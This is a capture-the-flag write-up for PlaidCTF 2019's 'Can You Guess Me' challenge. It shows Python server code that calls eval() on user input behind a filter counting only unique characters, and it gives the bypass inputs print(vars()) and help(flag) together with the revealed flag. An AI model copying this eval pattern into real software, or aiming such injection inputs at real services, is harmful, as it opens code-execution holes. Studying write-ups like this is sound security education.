PlaidCTF2019 - Can You Guess Me

Misc - 100pts

The Challenge

The challenge text leads to the python code running the challenge.

Misc (100 pts)
Here's the source to a guessing game: here 

You can access the server at

nc canyouguessme.pwni.ng 12349
#! /usr/bin/env python3

from sys import exit
from secret import secret_value_for_password, flag, exec

print(r"")
print(r"")
print(r"  ____         __   __           ____                     __  __       ")
print(r" / ___|__ _ _ _\ \ / /__  _   _ / ___|_   _  ___  ___ ___|  \/  | ___  ")
print(r"| |   / _` | '_ \ V / _ \| | | | |  _| | | |/ _ \/ __/ __| |\/| |/ _ \ ")
print(r"| |__| (_| | | | | | (_) | |_| | |_| | |_| |  __/\__ \__ \ |  | |  __/ ")
print(r" \____\__,_|_| |_|_|\___/ \__,_|\____|\__,_|\___||___/___/_|  |_|\___| ")
print(r"                                                                       ")
print(r"")
print(r"")

try:
    val = 0
    inp = input("Input value: ")
    count_digits = len(set(inp))
    if count_digits <= 10:          # Make sure it is a number
        val = eval(inp)
    else:
        raise

    if val == secret_value_for_password:
        print(flag)
    else:
        print("Nope. Better luck next time.")
except:
    print("Nope. No hacking.")
    exit(1)

The Solution

The exploitable flaw in ‘Can You Guess Me’ is twofold:

  1. the use of python’s eval() built-in function; and
  2. ineffective input sanitisation using python’s set() built-in cast function

set() counts unique elements, and allows for the use longer input as long as there are repeated characters. For example:

>>> len(set("aaaaaaaaaaaaaaaa"))
1

The input print(vars()) is sufficient to bypass the ineffective sanitisation.

There are also other python commands which fit under the character limit without using the set() flaw. help(flag) produces a very helpful error message:

Input value: help(flag)
No Python documentation found for 'PCTF{hmm_so_you_were_Able_2_g0lf_it_down?_Here_have_a_flag}'.
Use help() to get the interactive help utility.
Use help(str) for help on the str class.

Nope. Better luck next time.